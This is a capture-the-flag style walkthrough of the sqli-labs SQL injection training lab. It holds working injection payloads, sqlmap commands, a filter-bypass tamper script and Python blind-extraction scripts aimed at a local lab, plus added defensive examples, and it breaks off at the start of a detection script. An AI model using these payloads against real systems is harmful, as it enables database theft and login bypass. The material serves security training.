# sqli-labs
[TOC]
## Less-1: error based string

- Determine the type of the `id` parameter:

  `?id=1` succeeds; `?id=1-1` succeeds with the same result as `id=1`, so the value is handled as a string (no arithmetic takes place).

- Determine which quote closes the string:

  `?id='` raises an error; `?id="` succeeds with no change in the output.

- Use `updatexml` to extract the database, table and column names:

  ```
  ?id=' and updatexml(0x01,concat(0x7e,database(),0x7e),0x01)%23
  ?id=%27%20and%20updatexml(0x01,concat(0x7e,(select%20group_concat(table_name)%20from%20information_schema.tables%20where%20table_schema%20=%20%27security%27),0x7e),0x01)%23
  ?id=%27%20and%20updatexml(0x01,concat(0x7e,(select%20group_concat(column_name)%20from%20information_schema.columns%20where%20table_name%20=%20%27users%27),0x7e),0x01)%23
  ```

- Query the user passwords:

  ```
  ?id=%27%20and%20updatexml(0x01,concat(0x7e,(select%20concat(id,%27:%27,username,%27:%27,password)%20from%20users%20limit%200,1),0x7e),0x01)%23
  ```

- The sqlmap approach:

  ```
  sqlmap -u 'http://localhost:9090/Less-1/?id=1' --batch --dbs -p id
  sqlmap -u 'http://localhost:9090/Less-1/?id=1' --batch --current-db -p id
  sqlmap -u 'http://localhost:9090/Less-1/?id=1' --batch -D security --tables -p id
  sqlmap -u 'http://localhost:9090/Less-1/?id=1' --batch -D security -T users --dump -p id
  ```

  Output of the last command:

  ```
  Table: users
  [13 entries]
  +----+------------+----------+
  | id | password   | username |
  +----+------------+----------+
  | 1  | Dumb       | Dumb     |
  | 2  | I-kill-you | Angelina |
  | 3  | p@ssword   | Dummy    |
  | 4  | crappy     | secure   |
  | 5  | stupidity  | stupid   |
  | 6  | genious    | superman |
  | 7  | mob!le     | batman   |
  | 8  | admin      | admin    |
  | 9  | admin1     | admin1   |
  | 10 | admin2     | admin2   |
  | 11 | admin3     | admin3   |
  | 12 | dumbo      | dhakkan  |
  | 14 | admin4     | admin4   |
  +----+------------+----------+
  ```
## Less-2: error based integer

- Determine the type of the `id` parameter:

  `?id=1` succeeds; `?id=1-1` succeeds but returns no row; `?id=2-1` succeeds with the same result as `id=1`, so the value is evaluated as an integer.

- Enter an unclosed quote:

  `?id=1'` raises an error.

- Extract the database as in Less-1:

  ```
  ?id=1 and updatexml(0x01,concat(0x01,database(),0x01),0x01)
  ```
## Less-3: error based string

- Determine the type of the `id` parameter:

  `?id=1` succeeds; `?id=1-1` succeeds with the same result as `id=1`.

- Enter an unclosed quote:

  `?id=1'` raises an error, and the error message reveals a `)`.

- The injected statement must also close the `)`; extraction is otherwise the same as Less-1:

  ```
  ?id=1') and updatexml(0x01,concat(0x01,database(),0x01),0x01)%23
  ```
## Less-4: error based string

- Determine the type of the `id` parameter:

  `?id=1` succeeds; `?id=1-1` succeeds with the same result as `id=1`.

- Enter an unclosed quote:

  `?id=1"` raises an error, and the error message reveals a `)`.

- The injected statement must also close the `)`; extraction is otherwise the same as Less-1:

  ```
  ?id=1") and updatexml(0x01,concat(0x01,database(),0x01),0x01)%23
  ```
## Less-5: double query

- Determine the type of the `id` parameter:

  `?id=1` succeeds; `?id=1-1` succeeds with the same result as `id=1`.

- Enter an unclosed quote:

  `?id=1'` raises an error.

- Extract the database as in Less-1:

  ```
  ?id=1%27%20and%20updatexml(0x01,concat(0x01,database(),0x01),0x01)%23
  ```
## Less-6: double query

- Determine the type of the `id` parameter:

  `?id=1` succeeds; `?id=1-1` succeeds with the same result as `id=1`.

- Enter an unclosed quote:

  `?id=1"` raises an error.

- Extract the database as in Less-1:

  ```
  ?id=1%22%20and%20updatexml(0x01,concat(0x01,database(),0x01),0x01)%23
  ```
## Less-7: Dump into outfile

Why "dump into outfile" at all? The database runs as the mysql user and PHP runs as www-data, so a file written by MySQL cannot be reached from the web application anyway.

- Determine the type of the `id` parameter:

  `?id=1` succeeds; `?id=1-1` succeeds with the same result as `id=1`.

- Enter an unclosed quote:

  `?id=1'` raises an error ... `?id=1')) and 1=1 %23` shows that `'))` closes the expression.

- Boolean-based injection:

  ```
  ?id=1%27))%20and%20(select%20length(database()))%20=8%20%23
  ?id=1%27))%20and%20(select%20substr(database(),1,1))%20=%27s%27%20%23
  ?id=1%27))%20and%20(select%20length((select%20group_concat(table_name)%20from%20information_schema.tables%20where%20table_schema%20=%20%27security%27)))%20=29%20%23
  ?id=1%27))%20and%20(select%20length((select%20group_concat(column_name)%20from%20information_schema.columns%20where%20table_name=%20%27users%27)))%20=20%20%23
  ?id=1%27))%20and%20(select%20length((select%20concat(id,%27:%27,username,%27:%27,password)%20from%20users%20limit%201)))%20=%2011%20%23
  ```

- The above is for reference only; use sqlmap instead:

  ```
  sqlmap -u 'http://localhost:9090/Less-7/?id=1' --batch --dbs -p id --technique B
  sqlmap -u 'http://localhost:9090/Less-7/?id=1' --batch --current-db -p id --technique B
  sqlmap -u 'http://localhost:9090/Less-7/?id=1' --batch -D security --tables -p id --technique B
  sqlmap -u 'http://localhost:9090/Less-7/?id=1' --batch -D security -T users --dump -p id --technique B
  ```

  The dump is the same 13-row `users` table shown under Less-1.
## Less-8: Blind bool

- Determine the type of the `id` parameter:

  `?id=1` succeeds; `?id=1-1` succeeds with the same result as `id=1`.

- Enter an unclosed quote:

  `?id=1"` shows the normal output; `?id=1'` shows nothing; `?id=1' and 1=1 %23` shows the normal output; `?id=1' and 1=2 %23` shows nothing.

- Boolean-based injection is the same as Less-7.
## Less-9: Blind Time based

- Whatever is entered, the output never changes; after many attempts, time-based injection with single-quote closure was found:

  ```
  ?id=1' and (select sleep(10)) %23
  ```

- Go straight to sqlmap:

  ```
  sqlmap -u 'http://localhost:9090/Less-9/?id=1' --batch -D security -T users --dump -p id --technique B
  ```

  In fact the HTML length differs between a matching row and no row, which is why boolean-based injection works here as well.
## Less-10: Blind Time based

- Same as Less-9; the closing quote is `"`, and sqlmap needs `--level 2`.
## Less-11: Error based String

- Logging in with the username `'` raises an error; logging in with the username `' or 1=1 #` succeeds directly.
- Error-based injection to extract the database:

  ```
  uname=' and updatexml(1,concat(0x01,database(),0x01),1)#&passwd=&submit=Submit
  ```

- Use sqlmap for further extraction:

  4.1 Create the request file `11.post`:

  ```
  POST /Less-11/ HTTP/1.1
  Host: localhost:9090
  User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
  Accept-Language: en-US,en;q=0.5
  Accept-Encoding: gzip, deflate
  Content-Type: application/x-www-form-urlencoded
  Content-Length: 78
  Origin: http://localhost:9090
  DNT: 1
  Connection: keep-alive
  Referer: http://localhost:9090/Less-11/
  Upgrade-Insecure-Requests: 1
  Pragma: no-cache
  Cache-Control: no-cache

  uname=&passwd=&submit=Submit
  ```

  4.2 Run sqlmap against the request file:

  ```
  sqlmap -r 11.post --batch -D security -T users --dump -p uname --technique E
  ```
## Less-12: Error based string

Same as the previous level; the closure is `")`.

## Less-13: Error based string

Same as the previous level; the closure is `')`.

## Less-14: Error based string

Same as the previous level; the closure is `"`.
## Less-15: Blind Bool

- Logging in with the username `' or 1=1 #` succeeds directly. A sqlmap scan cannot exploit this as boolean-based, but can exploit it through `sleep`.
- Manual injection:

  ```python
  import string

  import requests

  URL = "http://localhost:9090/Less-15/"


  def req(sql):
      # Inject the condition into the username; a true condition shows the flag.jpg login page.
      data = {
          "uname": "' or {}#".format(sql),
          "passwd": "",
          "submit": "Submit",
      }
      res = requests.post(URL, data=data)
      return "flag.jpg" in res.text


  def leak(expr):
      # Recover the string value of a SQL expression: first its length, then one character at a time.
      length = 0
      for i in range(100):
          if req("(length({}) = {})".format(expr, i)):
              length = i
              break
      print(length)
      value = ""
      for i in range(length):
          for ch in string.printable:
              if req("(substr({},{},1) = '{}')".format(expr, i + 1, ch)):
                  value += ch
                  break
      print(value)
      return value


  def database():
      return leak("database()")


  def tables():
      return leak("(select group_concat(table_name) from information_schema.tables where table_schema = 'security')")


  def columns():
      return leak("(select group_concat(column_name) from information_schema.columns where table_name = 'users')")


  def dump():
      # Count the rows, then leak id:username:password for each row via LIMIT offset,1.
      count = 0
      for i in range(100):
          if req("((select count(*) from users) = {})".format(i)):
              count = i
              break
      print(count)
      for c in range(count):
          leak("(select concat(id,':',username,':',password) from users limit {},1)".format(c))


  def main():
      # database()
      # tables()
      # columns()
      dump()


  if __name__ == '__main__':
      main()
  ```

  The recovered results do not distinguish case, because the string comparison itself is case-insensitive.
## Less-16: Blind Time based

- Logging in with the username `") or 1=1 #` succeeds directly.
- sqlmap injection:

  ```
  sqlmap -r 16.post --batch -D security -T users --dump --dbms mysql -p uname
  ```
## Less-17: Update Query Error based

- Pitfalls: a valid username has to be known first, and the injected SQL must raise an error, otherwise it is easy to overwrite the passwords of the whole database.
- Injecting the `uname` parameter with `passwd` empty: no reaction to any odd SQL placed in `uname`.
- Injecting the `passwd` parameter with `uname` empty: likewise no reaction.
- Keep `passwd` as `'"` and brute-force `uname`; with `Dhakkan` the error message is echoed back. Then keep `uname` as `Dhakkan` and inject `passwd` by hand; running sqlmap here would corrupt the database.
- Extraction:

  ```
  uname=Dhakkan&passwd=' where 1 = updatexml(1,concat(0x7e,database(),0x7e),1)#&submit=Submit
  uname=Dhakkan&passwd=' where 1 = updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema = 'security'),0x7e),1)#&submit=Submit
  uname=Dhakkan&passwd=' where 1 = updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name= 'users'),0x7e),1)#&submit=Submit
  uname=Dhakkan&passwd=' where 1 = updatexml(1,concat(0x7e,(select concat(id,':',username,':',password) from users limit 1),0x7e),1)#&submit=Submit
  ```
## Less-18: Header injection Error based

- Pitfall: a user that can actually log in has to be known.
- Injecting `uname` and `passwd` has no effect.
- Injecting the `X-Forwarded-For` and `X-Real-IP` headers has no effect.
- Weak-password guessing finds that `admin:admin` logs in, and the User-Agent is echoed back.
- Putting `'"` into the User-Agent reveals single-quote closure with two more columns after it.
- Extraction:

  ```
  User-Agent: ',1,updatexml(1,concat(0x7e,database(),0x7e),1))#
  ```

- sqlmap injection:

  ```
  sqlmap -r 18.post --batch -D security -T users --dump --technique E -p User-Agent
  ```
## Less-19: Header injection Error based

Same as Less-17 above; the injection point is the `Referer` header.

## Less-20: Cookie injection Error based

Same as Less-17 above; the injection point is the `Cookie` header.

## Less-21: Cookie injection base64

Same as Less-20 above; the injection point is the Cookie, whose value is Base64-encoded.
sqlmap needs the `base64encode.py` tamper:

```
sqlmap -r 21.get --batch -D security -T users --dump --technique E -p Cookie --tamper base64encode.py
```

## Less-22: Cookie injection base64

Same as Less-21 above; the injection point is the Cookie, and the closure is a double quote.
sqlmap needs the `base64encode.py` tamper:

```
sqlmap -r 21.get --batch -D security -T users --dump --technique E -p Cookie --tamper base64encode.py
```
## Less-23: Error Based

- Probe the `id` parameter:

  ```
  ?id=1                        normal
  ?id=1-1                      normal
  ?id=1'                       error
  ?id=1' %23                   error
  ?id=1' --+                   error
  ?id=1' and 1=1 and ''='      normal
  ?id=1' and 1=2 and ''='      no output
  ```

- Error-based injection goes into the middle condition position; details omitted.
## Less-24: Second Order Injection

- Register a normal user `abc:abc`, log in, change the password, log out, and log in with the new password. The whole flow uses 3 endpoints: register, login and change password; verify each one in turn.
- Register the user `'":'"` (username and password are both a single quote followed by a double quote): registration succeeds. Log in as `'":'"`: login succeeds. Changing the password shows no success page, so it presumably failed: logging in with the new password fails, logging in with the original password succeeds.
- This shows the password change has an injection point.
- Change the password of user `abc` to `'"` and log in again: login succeeds, which proves the injection point is in the username rather than the password.
- Register the user `admin'#:123"` and change its password to `123456`.
- Log in as user `admin` with password `123456`.
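A worked model of the second-order bug in this level, written for this note and not part of sqli-labs: the hypothetical `register` escapes quotes on the way in, but `change_password_vulnerable` re-embeds the stored username into an UPDATE, so a name like `admin'--` (SQLite's comment syntax, standing in for MySQL's `#`) rewrites the `admin` row; `change_password_fixed` binds parameters instead. The table and its rows are constructed in memory.

```python
import sqlite3


def make_db():
    # Constructed in-memory table with the shape of the lab's users table (hypothetical rows).
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT)")
    db.executemany("INSERT INTO users (username, password) VALUES (?, ?)",
                   [("admin", "admin"), ("abc", "abc")])
    db.commit()
    return db


def register(db, username, password):
    # Registration escapes quotes (the role addslashes plays in the lab), so the INSERT is safe
    # and the quote is stored literally in the username column.
    safe_user = username.replace("'", "''")
    safe_pass = password.replace("'", "''")
    db.execute("INSERT INTO users (username, password) VALUES ('%s', '%s')" % (safe_user, safe_pass))
    db.commit()


def change_password_vulnerable(db, username, new_password):
    # The username comes from the database, not the request, so it is trusted and concatenated:
    # the stored quote becomes live again. WHERE username='admin'--' updates the admin row.
    sql = "UPDATE users SET password='%s' WHERE username='%s'" % (
        new_password.replace("'", "''"), username)
    db.execute(sql)
    db.commit()


def change_password_fixed(db, username, new_password):
    # Parameter binding: data never becomes SQL text, no matter where it was loaded from.
    db.execute("UPDATE users SET password=? WHERE username=?", (new_password, username))
    db.commit()


def password_of(db, username):
    row = db.execute("SELECT password FROM users WHERE username=?", (username,)).fetchone()
    return row[0] if row else None


def demo(fixed):
    # Returns (admin's password, attacker's password) after the attacker changes their own password.
    db = make_db()
    attacker = "admin'--"
    register(db, attacker, "123")
    stored = db.execute("SELECT username FROM users WHERE username=?", (attacker,)).fetchone()[0]
    change = change_password_fixed if fixed else change_password_vulnerable
    change(db, stored, "123456")
    return password_of(db, "admin"), password_of(db, attacker)


if __name__ == "__main__":
    print("vulnerable:", demo(False))  # admin's password is overwritten
    print("fixed:     ", demo(True))   # only the attacker's own row changes
```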
## Less-25: Trick with OR & AND

- Determine the type of the `id` parameter:

  `?id=1` normal; `?id=1'"` error.

- Try error-based injection:

  ```
  ?id=1' and updatexml(1,concat(0x7e,database(),0x7e),1)%23
  ```

  `and` is deleted from the input; double-write it and try again:

  ```
  ?id=1' anandd updatexml(1,concat(0x7e,database(),0x7e),1)%23
  ```

  The database name comes out in the error.

- Write a simple sqlmap tamper that applies the double-writing to get past the filter:

  ```python
  #!/usr/bin/env python
  from lib.core.enums import PRIORITY

  __priority__ = PRIORITY.LOW


  def dependencies():
      pass


  def tamper(payload, **kwargs):
      """
      Replaces and with anandd, or with oorr, so that the filter's single deletion
      leaves the original keyword behind.
      """
      if payload:
          payload = payload.replace("and", "anandd")
          payload = payload.replace("AND", "ANANDD")
          payload = payload.replace("or", "oorr")
          payload = payload.replace("OR", "OORR")
      return payload
  ```

  ```
  sqlmap -u "http://localhost:9090/Less-25/?id=1" --batch --dbms mysql --technique E -p id --tamper doubleword.py -D security -T users --dump
  ```

  The dump is the same 13-row `users` table shown under Less-1.
## Less-26: Trick with comment

- Determine the injection type:

  `?id=1'"`: single-quote closure. `?id=1' or 1=1 #`: spaces and comment characters are both filtered. `?id=1'||1=1||''='`: succeeds.

- Extract database, tables and columns (note that `or` is stripped even inside `information_schema` and `password`, hence the doubled spelling):

  ```
  http://localhost:9090/Less-26/?id=1%27||updatexml(1,concat(0x7e,database(),0x7e),1)||%27%27=%27
  http://localhost:9090/Less-26/?id=1%27||updatexml(1,concat(0x7e,(select(group_concat(table_name))from(infoorrmation_schema.tables)where`table_schema`=%27security%27),0x7e),1)||%27%27=%27
  http://localhost:9090/Less-26/?id=1%27||updatexml(1,concat(0x7e,(select(group_concat(column_name))from(infoorrmation_schema.columns)where`table_name`=%27users%27),0x7e),1)||%27%27=%27
  http://localhost:9090/Less-26/?id=1%27||updatexml(1,concat(0x7e,(select(concat(id,':',username,':',passwoorrd))from(users)where`id`=%271%27),0x7e),1)||%27%27=%27
  ```
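Why the double-written keywords of Less-25 and the `infoorrmation_schema` / `passwoorrd` spellings of Less-26 come from the same design flaw, as an added example that is not the lab's code: a filter that deletes each keyword once lets `anandd` collapse back to `and`, re-applying it until stable still mangles legitimate words such as `password`, and a case-sensitive list misses `SeLect` (Less-27). Rejecting whole-word matches avoids the rewrite, although only parameterised queries actually remove the injection. `KEYWORDS` and the function names are assumptions of this example.

```python
import re

# Blacklist of the kind these levels use (assumed for this example).
KEYWORDS = ("and", "or", "select", "union")


def strip_once(value):
    # Delete each keyword a single time, case-sensitively: the behaviour observed in Less-25/26.
    # "anandd" -> "and", "infoorrmation" -> "information", but also "password" -> "passwd".
    for kw in KEYWORDS:
        value = value.replace(kw, "")
    return value


def strip_until_stable(value):
    # Re-apply the filter until nothing changes, so a doubled keyword cannot re-form.
    # This defeats double-writing but still corrupts legitimate input and still misses "SeLect".
    while True:
        stripped = strip_once(value)
        if stripped == value:
            return value
        value = stripped


def allowed_by_wordlist(value):
    # Reject instead of rewrite: a case-insensitive whole-word match fails the input outright.
    # "anandd" passes (and then breaks the SQL as a syntax error, not as an injected AND);
    # "password" passes untouched; "SeLect" and "or 1=1" are refused.
    pattern = r"\b(?:%s)\b" % "|".join(KEYWORDS)
    return re.search(pattern, value, re.IGNORECASE) is None


if __name__ == "__main__":
    for sample in ("1' anandd 1=1", "infoorrmation_schema", "password", "SeLect 1"):
        print("%-22r once=%-22r stable=%-22r allowed=%s" % (
            sample, strip_once(sample), strip_until_stable(sample), allowed_by_wordlist(sample)))
```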
## Less-26a: Trick with comment

- Test the injection type:

  `?id=1` succeeds; `?id='"` fails; `?id='||''='` and `?id='||'1'='` fail; `?id='||1=1||'1'='` succeeds; `?id='||1=2||'1'='` fails: blind boolean.

- Brute-force attempt:

  ```
  http://localhost:9090/Less-26a/?id=%27||(select(length(database())))=8||%271%27=%27
  http://localhost:9090/Less-26a/?id=%27||(select(substr(database(),1,1)))='s'||%271%27=%27
  ```

  The rest is omitted.
## Less-27: Trick with select & union

Same as Less-26; `select` is filtered, use `SeLect` instead.

## Less-27a: Trick with select & union

Same as the two levels above, with double-quote closure, `SeLect`, and blind boolean:

```
http://localhost:9090/Less-27a/?id=%22||(SeLect(length(database())))=8||%221%22=%22
```

## Less-28: Trick with select & union

Same as the previous level, with single-quote closure.

## Less-28a: Trick with select & union

Same as Less-27a above.

## Less-29: Protection with WAF

The WAF does not seem to do anything; basic error based.

## Less-30: Protection with WAF

The WAF does not seem to do anything; basic blind bool.

## Less-31: Protection with WAF

Same as Less-29 above.
## Less-32: Bypass addslashes

`%df` swallows the backslash that `addslashes` inserts: with a GBK connection charset, the bytes `0xDF 0x5C` are read as one double-byte character, so the quote that follows is left unescaped.

```
?id=%df' or 1=1 %23                                         succeeds
?id=%df' or updatexml(1,concat(0x7e,database(),0x7e),1)%23
?id=%df' or updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=unhex(7365637572697479)),0x7e),1)%23
?id=%df' or updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name=unhex(7573657273)),0x7e),1)%23
?id=%df' or updatexml(1,concat(0x7e,(select concat(id,0x3a,username,0x3a,password) from users limit 0,1),0x7e),1)%23
```
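To see exactly what `%df` does to the `addslashes` output, an added example (not from the lab) that escapes the raw request bytes the way PHP does and then decodes the result with the server's connection charset; `quote_survives` reports whether the quote is still unescaped once the bytes are parsed as characters. The names are this example's own; the lesson is that byte-wise escaping is only safe when the escaping function knows the connection charset, and that bound parameters sidestep the question entirely.

```python
def addslashes(text):
    # PHP addslashes(): a backslash before ' " \ and NUL, applied character by character.
    out = []
    for ch in text:
        if ch in "'\"\\\x00":
            out.append("\\")
        out.append(ch)
    return "".join(out)


def escape_bytewise(raw):
    # PHP strings are byte strings, so addslashes sees one byte at a time; latin-1 keeps
    # every byte value as-is on the way in and out.
    return addslashes(raw.decode("latin-1")).encode("latin-1")


def server_view(raw, charset):
    # How MySQL sees the escaped bytes once it decodes them with the connection charset.
    return escape_bytewise(raw).decode(charset, errors="replace")


def quote_survives(raw, charset):
    # True when a quote is present that is no longer preceded by a backslash, i.e. the
    # escaping was undone by the charset decoding.
    parsed = server_view(raw, charset)
    return "'" in parsed and "\\'" not in parsed


if __name__ == "__main__":
    payload = b"\xdf'"                     # the %df' prefix from this level
    print(escape_bytewise(payload))        # b"\xdf\\'": addslashes did its job byte-wise
    print(server_view(payload, "gbk"))     # 0xDF 0x5C became one CJK character, quote is bare
    print(quote_survives(payload, "gbk"))  # True
    print(quote_survives(payload, "utf-8"))  # False: 0xDF is just an invalid byte, backslash stays
    print(quote_survives(b"1'", "gbk"))    # False: a plain quote stays escaped
```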
## Less-34: Bypass ADD SLASHES

The POST version of Less-32.

## Less-35: Bypass Add SLASHES

A simplified version of Less-32; no quote is needed.

## Less-36: Bypass MySQL real escape

Same as Less-32.

## Less-37: Bypass MySQL real escape

Same as Less-34.

## Less-38: stacked Query

Basic error based.

## Less-39: stacked Query

Basic error based.

## Less-40: stacked Query

Basic blind bool.

## Less-41: stacked Query

Basic blind bool.

## Less-42: stacked Query error based

The `password` field is injectable, single-quote closure, error based.

## Less-43: stacked Query error based

The `password` field is injectable, single quote plus parenthesis closure, error based.

## Less-44: stacked Query blind

The `password` field is injectable, single quote plus parenthesis closure; boolean-based injection on whether the response HTTP status code is 302:

```
login_user=&login_password=' or length(database()) =8#&mysubmit=Login
```

## Less-45: stacked Query blind

Same as Less-44 above, single quote plus parenthesis closure.
## Less-46: ORDER BY

```
?sort=1 || updatexml(1,concat(0x7e,database(),0x7e),1)
```

## Less-47: ORDER BY

Same as Less-47 above.

## Less-48: ORDER BY Blind

```
?sort=if (1=1,1,(select 1 union select 2))      output shown
?sort=if (1=2,1,(select 1 union select 2))      no output
```

Blind bool.

## Less-49: ORDER BY Blind

```
?sort=2' and if(1=1,1,(select 1 union select 2))%23      output shown
?sort=2' and if(1=2,1,(select 1 union select 2))%23      no output
```

Blind bool.

## Less-50: ORDER BY

```
?sort=updatexml(1,concat(0x7e,database(),0x7e),1)
```

Error based.

## Less-51: ORDER BY

```
?sort=' || updatexml(1,concat(0x7e,database(),0x7e),1)%23
```

Error based.

## Less-52: ORDER BY

Same as Less-48.

## Less-53: ORDER BY

Same as Less-49.
## Less-54: Challenge-1

```
?id=1
?id=1"
?id=1' %23
?id=1' order by 3 %23
?id=1' order by 4 %23
?id=-1' union select 1,1,group_concat(schema_name) from information_schema.schemata %23
?id=-1' union select 1,1,group_concat(table_name) from information_schema.tables where table_schema='challenges' %23
?id=-1' union select 1,1,group_concat(column_name) from information_schema.columns where table_name='P3KMPMWT2P' %23
?id=-1' union select id,secret_7HNV,concat(sessid,':',tryy) from challenges.P3KMPMWT2P %23
```
## Less-55: Challenge-2

```
?id=1
?id=1'%23
?id=1"%23
?id=2-1
?id=-1 union select 1,1,group_concat(table_name) from information_schema.tables where table_schema='challenges' %23
?id=-1) union select 1,1,group_concat(table_name) from information_schema.tables where table_schema='challenges' %23
?id=-1) union select 1,1,group_concat(column_name) from information_schema.columns where table_name='INEAJ9ROW1' %23
?id=-1' union select id,secret_YE4X,concat(sessid,':',tryy) from challenges.INEAJ9ROW1 %23
```
## Less-56: Challenge-3

```
?id=1
?id=1'%23
?id=1"%23
?id=-1" union select 1,1,group_concat(table_name) from information_schema.tables where table_schema='challenges' %23
?id=-1') union select 1,1,group_concat(table_name) from information_schema.tables where table_schema='challenges' %23
?id=-1') union select 1,1,group_concat(column_name) from information_schema.columns where table_name='XB1AMCG87R' %23
?id=-1') union select id,secret_2YG9,concat(sessid,':',tryy) from challenges.XB1AMCG87R %23
```
## Less-57: Challenge-4

```
?id=1
?id=1'%23
?id=-1' union select 1,1,group_concat(table_name) from information_schema.tables where table_schema='challenges' %23
?id=-1" union select 1,1,group_concat(table_name) from information_schema.tables where table_schema='challenges' %23
?id=-1" union select 1,1,group_concat(column_name) from information_schema.columns where table_name='ZLFUJA075M' %23
?id=-1" union select id,secret_PXK5,concat(sessid,':',tryy) from challenges.ZLFUJA075M %23
```
## Less-58: Challenge-5

```
?id=-1' union select 1,1,group_concat(table_name) from information_schema.tables where table_schema='challenges' %23
?id=-1" union select 1,1,group_concat(table_name) from information_schema.tables where table_schema='challenges' %23
?id=-1' and updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema='challenges'),0x7e),1) %23
?id=-1' and updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name='W7PLNH9DHZ'),0x7e),1) %23
?id=-1' and updatexml(1,concat(0x7e,(select secret_O572 from challenges.W7PLNH9DHZ),0x7e),1) %23
```
## Less-59: Challenge-6

```
?id=-1' and updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema='challenges'),0x7e),1) %23
?id='"
?id=-1 and updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema='challenges'),0x7e),1) %23
?id=-1 and updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name='MJ77P2XKIV'),0x7e),1) %23
?id=-1 and updatexml(1,concat(0x7e,(select secret_C8VM from challenges.MJ77P2XKIV),0x7e),1) %23
```
## Less-60: Challenge-7

```
?id='"
?id=-1") and updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema='challenges'),0x7e),1) %23
?id=-1") and updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name='V97YZ9KR3X'),0x7e),1) %23
?id=-1") and updatexml(1,concat(0x7e,(select secret_80IV from challenges.V97YZ9KR3X),0x7e),1) %23
```
## Less-61: Challenge-8

```
?id='"
?id=-1')) and updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema='challenges'),0x7e),1) %23
?id=-1')) and updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name='FJIXLCJP1F'),0x7e),1) %23
?id=-1')) and updatexml(1,concat(0x7e,(select secret_4MGK from challenges.FJIXLCJP1F),0x7e),1) %23
```
## Less-62: Challenge-9

```
?id=1
?id=1 and 1=2 %23
?id=1' and 1=2 %23
?id=1') and 1=2 %23
?id=1') and 1=1 %23      confirms blind boolean and the ') closure
```

The challenge limits the number of requests, so each character is leaked as two modular residues instead of by comparison against every candidate:

```python
# 83 requests in total
from urllib.parse import quote

import requests
from lxml import etree

url = "http://localhost:9090/Less-62/?id={}"
headers = {
    "Host": "localhost:9090",
    "User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0",
    "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8",
    "Accept-Language": "en-US,en;q=0.5",
    "Accept-Encoding": "gzip, deflate",
    "DNT": "1",
    "Connection": "keep-alive",
    "Cookie": "challenge=2b720b5359202de2d62768369718f694",
    "Upgrade-Insecure-Requests": "1",
    "Pragma": "no-cache",
    "Cache-Control": "no-cache",
}
names = []


def req(sql):
    # The injected subquery evaluates to a row id; the login name echoed for that id is
    # mapped back to the number through the names list filled by find_names().
    p = quote("-1') or id = ({}) #".format(sql))
    u = url.format(p)
    print(u)
    res = requests.post(u, headers=headers)
    html = etree.HTML(res.text)
    txt = html.xpath("/html/body/div[2]/font[2]/font/text()")
    if len(txt) != 0:
        name = str(txt[0]).replace("Your Login name :", "")
        return names.index(name) + 1
    return -1


def find_names():
    # Record the login name behind each id in order, stopping at the first empty result.
    for i in range(1, 15):
        res = requests.get(url.format(i), headers=headers)
        html = etree.HTML(res.text)
        txt = html.xpath("/html/body/div[2]/font[2]/font/text()")
        print(txt)
        if len(txt) != 0:
            names.append(str(txt[0]).replace("Your Login name :", ""))
        else:
            break
    print(names)


def find_number(m1, m2):
    # Recover n < 110 from its residues n mod 10 == m1 and n mod 11 == m2,
    # so one character costs two requests rather than one per candidate value.
    for i in range(11):
        n1 = 10 * i + m1
        for j in range(10):
            n2 = 11 * j + m2
            if n1 == n2:
                return n2


def tables():
    # ascii(char)-47 is leaked as two residues, each shifted by +1 so it lands on a valid id.
    table_name = ""
    sql1 = "select mod(n,10)+1 from (select ascii(substr(group_concat(table_name),{},1))-47 as n from " \
           "information_schema.tables where table_schema='challenges')t"
    sql2 = "select mod(n,11)+1 from (select ascii(substr(group_concat(table_name),{},1))-47 as n from " \
           "information_schema.tables where table_schema='challenges')t"
    for i in range(1, 100):
        m1 = req(sql1.format(i))
        if m1 == -1:
            break
        m2 = req(sql2.format(i))
        if m2 == -1:
            break
        asc = find_number(m1 - 1, m2 - 1) + 47
        table_name += chr(asc)
    return table_name


def dump(table_name):
    # Same residue trick on column c (the third column) of the first real row, which
    # `limit 1,1` selects after the constant row of the union.
    value = ""
    sql1 = "select mod(n,10)+1 from (select ascii(substr(c,{},1))-47 as n from (select 1 as a,2 as b,3 as c," \
           "4 as d union select * from challenges.{} limit 1,1)t)tt"
    sql2 = "select mod(n,11)+1 from (select ascii(substr(c,{},1))-47 as n from (select 1 as a,2 as b,3 as c," \
           "4 as d union select * from challenges.{} limit 1,1)t)tt"
    for i in range(1, 100):
        m1 = req(sql1.format(i, table_name))
        if m1 == -1:
            break
        m2 = req(sql2.format(i, table_name))
        if m2 == -1:
            break
        asc = find_number(m1 - 1, m2 - 1) + 47
        value += chr(asc)
    return value


def main():
    find_names()
    table_name = tables()
    value = dump(table_name)
    print(value)


if __name__ == '__main__':
    main()
```
## Less-63: Challenge-10

Same as Less-62 above; the closure is a single quote `'`.

## Less-64: Challenge-11

Same as Less-62 above; the closure is a double parenthesis `))`.

## Less-65: Challenge-12

Same as Less-62 above; the closure is a double quote plus parenthesis `")`.
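For the detection side, an added example (not from this write-up) that classifies access-log request lines against the payload families used throughout these levels: `updatexml` error-based extraction, `information_schema` enumeration, `length`/`substr` boolean probes, `sleep` timing, double-written keywords (Less-25) and the `%df` wide-byte prefix (Less-32). The rule names and the sample log lines are constructed for this example; the request text is decoded before matching except for the wide-byte rule, which only makes sense on the raw encoded form.

```python
import re
from urllib.parse import unquote

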